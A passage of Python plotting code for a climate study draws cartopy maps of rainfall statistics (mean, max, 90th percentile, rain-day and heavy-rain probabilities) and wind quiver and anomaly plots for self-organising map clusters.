cbar.ax.set_yticklabels(np.arange(np.max(arr), dtype=int)+1)
plt.suptitle('Distribution of clusters for each month', fontweight='bold', x=.46, y=.95, fontsize=33)
plt.title('Greyed-out/non-colored regions indicate 0 occurrences on such dates for these clusters.', y=1.04, fontsize=15)
print(f"Time taken is {utils.time_since(ARMonthFracstarttime)}\n")
fn = f"{dest}/{model.month_names_joined}_ARmonthfrac_granular_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_mean_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting MEAN rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
zero_to_ten = plt.cm.pink(np.linspace(1, .2, 3))
eleven_to_25 = plt.cm.gist_earth(np.linspace(0.75, 0.2, 4))
twnty5_to_40 = plt.cm.gist_rainbow(np.linspace(0.7, 0, 5))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
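# stitched colormap: three distinct segments give low, mid and heavy rainfall bands contrasting hues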
fig.suptitle(f'Mean rainfall (mm) over {model.dir_str}', fontweight='bold')
for clus in range(len(np.unique(labels_ar))):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.mean("time").T
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='black')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.5, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
if clus == 0: # title
ax_rf_plot.set_title(f"Rainfall plots from SOM nodes,\ncluster no.{clus+1}", loc='left')
else: ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data, np.linspace(0,50,51),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Rainfall (mm)', orientation='horizontal', pad=0.01)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_mean_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_max_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting MAX rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
a = plt.cm.pink(np.linspace(.9, .2, 2))
b = plt.cm.gnuplot2(np.linspace(0.4, .9, 6))
all_colors = np.vstack((a, b))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'MAX rainfall (mm) over individual grids for domain {model.dir_str}', fontweight='bold')
for clus in range(len(np.unique(labels_ar))):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.max("time").T
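# mask cells whose maximum is <=1 mm so effectively dry cells stay unfilled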
data_gt1mm = np.ma.masked_where(data<=1, data)
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='silver')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.5, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.3, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data_gt1mm,
np.arange(0,500,50),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Rainfall (mm)', orientation='horizontal', pad=0.01,
ticks=np.arange(0,500,50))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_max_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting proba of >1mm rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
labels_ar = utils.open_pickle(model.labels_ar_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
a = plt.cm.YlOrRd(np.linspace(.9, .2, 5))
b = plt.cm.YlGnBu(np.linspace(.2, .8, 10))
all_colors = np.vstack((a,b))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Proportion of grid with >1 mm of rainfall (raindays), over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\n' \
f'Note: regions in black indicate 0.0% chance of >1mm rainfall across grid members.', fontweight='bold')
for clus in range(len(np.unique(labels_ar))):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
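# rain-day probability per grid cell: average the boolean (>1 mm) masks over every day in this cluster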
mean = np.mean([data.isel(time=t).precipitationCal.T.values > 1 for t in range(data.time.size)], axis=0)
data_pred_proba_morethan1mm = np.ma.masked_where(mean<=0, mean)*100
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='w')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data_pred_proba_morethan1mm,
np.linspace(0,100,11),
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='w', inline=True, fmt='%1.f', fontsize=8)
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%)', orientation='horizontal', pad=0.01, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavyrf_gt50mm_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting proba of HEAVY (>50mm) rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon')
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat')
zero_to_ten = plt.cm.pink(np.linspace(1, .2, 3))
eleven_to_25 = plt.cm.gist_earth(np.linspace(0.75, 0.2, 5))
twnty5_to_40 = plt.cm.gist_stern(np.linspace(0.3, 0.1, 5))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Proportion of grid with >50 mm of rainfall (heavy rain), over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
for clus in range(optimal_k):
time.sleep(1); gc.collect()
# fraction (0-1) of this cluster's days exceeding 50 mm at each grid cell, precomputed by get_RF_calculations
data_pred_proba_morethan50mm = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus)
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='silver')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.3, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.3, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, data_pred_proba_morethan50mm,
np.linspace(0,1,101),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (fraction, 0 to 1)', orientation='horizontal', pad=0.01)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_90th_percentile_plots(model, dest, optimal_k):
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting 90th of rainfall over grids now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
z = plt.cm.gist_stern(np.linspace(1, .9, 1))
a = plt.cm.terrain(np.linspace(0.6, .1, 4))
b = plt.cm.gnuplot2(np.linspace(0.4, .9, 12))
all_colors = np.vstack((z, a, b))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'90th percentile RF over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
for i, clus in enumerate([i for i in np.unique(RFprec_to_ClusterLabels_dataset.cluster) if not np.isnan(i)]):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N)).precipitationCal.values
data_gt1mm = np.ma.masked_where(data<=1, data)
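# gridwise 90th percentile across this cluster's days, taken on the field masked at <=1 mm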
percen_90 = np.percentile(data_gt1mm, 90, axis=0).T
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[i], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('white')
ax_rf_plot.add_feature(cf.LAND, facecolor='silver')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.8, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, percen_90,
np.arange(0,500,12.5),
cmap=terrain_map,
extend='max')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Rainfall (mm)', orientation='horizontal', pad=0.01,
ticks=np.arange(0,500,50))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_quiver_plots(model, dest, optimal_k):
quiverstarttime = timer(); print(f"{utils.time_now()} - Drawing quiver sub-plots now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
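# larger domains get coarser vector subsampling and thinner coastlines to keep the quiver field legible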
if area > 3000: skip_interval=4; coastline_lw=.4
elif 2000 < area <= 3000: skip_interval=3; coastline_lw=.6
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon_qp = model.X[::skip_interval].values
lat_qp = model.Y[::skip_interval].values
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure} hPa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time").values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time").values
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='white')
ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_qp.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hPa,\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
# wind speed magnitude, subsampled to the quiver grid
wndspd = np.hypot(vwnd_gridded_centroids, uwnd_gridded_centroids)[::skip_interval,::skip_interval]
time.sleep(1); gc.collect()
# normalise u/v to unit vectors: arrows show direction only, the filled contours carry the magnitude
u = uwnd_gridded_centroids[::skip_interval,::skip_interval]/wndspd
v = vwnd_gridded_centroids[::skip_interval,::skip_interval]/wndspd
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.35, color='orangered', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Wind speed (m/s)', orientation='horizontal',pad=0.01)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver plots plotted for {pressure} hPa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_v5-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_quiver_ANOM_whole(model, dest, optimal_k):
quiverstarttime = timer(); print(f'{utils.time_now()} - Finishing quiver ANOMALY plots (whole)...')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
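# same area-based subsampling as the non-anomaly quiver plots: fewer arrows over larger domains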
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3; coastline_lw=.6
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon = target_ds_withClusterLabels.lon[::skip_interval]
lat = target_ds_withClusterLabels.lat[::skip_interval]
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-10,10,21)]
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure} hPa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
uwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean("time").values
vwnd_baseline = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean("time").values
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time").values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time").values
uwnd_mean = uwnd_gridded_centroids - uwnd_baseline
vwnd_mean = vwnd_gridded_centroids - vwnd_baseline
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hPa for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_mean, uwnd_mean)
# normalise to unit vectors: the arrows show anomaly direction only, the filled contours carry the magnitude
u = uwnd_mean/wndspd
v = vwnd_mean/wndspd
wndspd = wndspd[::skip_interval,::skip_interval]
u = u[::skip_interval,::skip_interval]
v = v[::skip_interval,::skip_interval]
spd_plot = ax_qp.contourf(lon, lat, wndspd, levels,
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon, lat, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.35, color='orangered', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Wind anomaly magnitude (m/s)', orientation='horizontal',pad=0.01,
ticks=levels)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver ANOMALY plots plotted for {pressure} hPa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_v1_ANOM-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver ANOMALY plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_quiver_plots_sgonly(model, dest, optimal_k):
quiverstarttime = timer(); print(f"{utils.time_now()} - Drawing quiver sub-plots (sgonly) now...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_sg = 101
e_lim_sg = 107
s_lim_sg = -1
n_lim_sg = 4
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(
lon=slice(w_lim_sg, e_lim_sg),lat=slice(n_lim_sg, s_lim_sg))
coastline_lw = 1
skip_interval=1; minshaft=3; scale=10
lon_qp = target_ds_withClusterLabels.lon[::skip_interval].values
lat_qp = target_ds_withClusterLabels.lat[::skip_interval].values
w = 102
e = 105
s = 0.5
n = 2
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure} hPa...')
fig, gs_qp = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
print(f"{utils.time_now()} - Cluster {cluster}: ")
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
ax_qp = fig.add_subplot(gs_qp[cluster], projection=ccrs.PlateCarree())
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([w, e, s, n])
if cluster < model.grid_width: # top ticks
